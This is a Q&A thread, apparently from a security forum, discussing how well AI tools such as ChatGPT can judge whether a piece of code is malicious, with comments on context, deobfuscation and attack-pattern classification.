2

A recent question of mine was closed, as I effectively requested code analysis. A comment said:

If you want an analysis, you could pop it into something like chatgpt

Is there any analysis (or anecdotes) about how effective modern AI tools are at identifying the true purpose of a bit of code?

4
  • 1
    Malicious code is no different to other code. It’s the context that matters- a code that creates a UUID (like yours) for business management is not malicious, but the exact same piece of code used to steal unauthorised information is then malicious as it’s use is malicious. Commented Jun 27 at 11:04
  • 2
    AI could tell you what the code does, but then it’s up to you to decide if thats ‘malicious.’ Commented Jun 27 at 11:08
  • That does not necessarily matter. These tools are great for finding hidden pasterns in data. As long as someone can define a set of code that we would like to run and code we would not we can measure the predictive power for an algorithm to classify a previously unseen bit of code into one or other class. It seems plausible that these tools could have such predictive power, I wondered if anyone has looked.
    – User65535
    Commented Jun 27 at 11:08
  • "true" purpose is subjective. What you asked for was a functional analysis. LLMs do that very well. I removed the opinion-based and tangential part of your question.
    – schroeder
    Commented Jun 27 at 12:40

2 Answers 2

5
2
  • The Ömer Aslan one looks amazing if it is credible. Such a small model with apparently incredible accuracy. I wonder how generalisation it is.
    – User65535
    Commented Jun 27 at 13:21
  • 1
    @User65535 It's cherrypicking, LLMs are very bad at deobfuscation. Also you would spend much more time trying to make them do the right thing rather than doing it yourself in the first place. Commented Jun 27 at 15:12
1

Like I said in my comment, actual code is neither malicious or non malicious. It is how the code is used, and your own options that determines this.

With GPT4.0, I confirmed my theory of what your code in your previous question did; it tries to generates a UUID.

Take this for example: would this code seem malicious and environment where good, consented session management is crucial to a client experience? Most people would say probably not.

But would it seem malicious if it was intrusively and sneakily run without you knowing, and with the information used for something like cross site tracking? Most people would say probably.

I’m not saying it is doing that (although it could be)- but it’s impossible to tell its intentions with just the code, which is my whole point.

LMs like ChatGPT don’t have opinions nor background information unless provided, so while AI is great at identifying what code does, whether its malicious is opinionated, situational, and something only you can decide.

4
  • Classification won’t work well with very generic code like in your example, but that doesn’t mean it’s generally impossible to distinguish between malicious and benign code. For example, there are already large collections of typical attack techniques like MITRE ATT&CK which show that attackers take very specific actions to systematically collect sensitive data, exfiltrate this data, destroy assets, avoid detection etc. In benign code, such goals and the corresponding actions should be rather unusual.
    – Ja1024
    Commented Jun 28 at 3:42
  • Of course there will always be corner cases that lead to both false positives and negatives. I also have no clue how well current ML models actually perform at this task. But the approach is valid. A human analyst is facing the same challenges as an ML model and may even take the same approach: They get unknown code, they don’t necessarily have a lot of context information, but they still have to decide whether the code is (likely) malicious. To solve this, looking for typical attack patterns is an obvious choice, and this is what ML can, in principle, do as well.
    – Ja1024
    Commented Jun 28 at 3:43
  • @Ja1024 Well of course; I entirely agree- LMs can be really good at spotting certain traffic patterns and data in implementations such as DPI for firewalls, all I am trying to illustrate to the OP is that even on these situations an LM is still only recognising what is happening, for example code that will erase all files then because this is considered ‘malicious’ by it’s instructions it will report it. But yes, I totally agree. Commented Jun 28 at 4:30
  • And this is just an example. Commented Jun 28 at 4:31

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .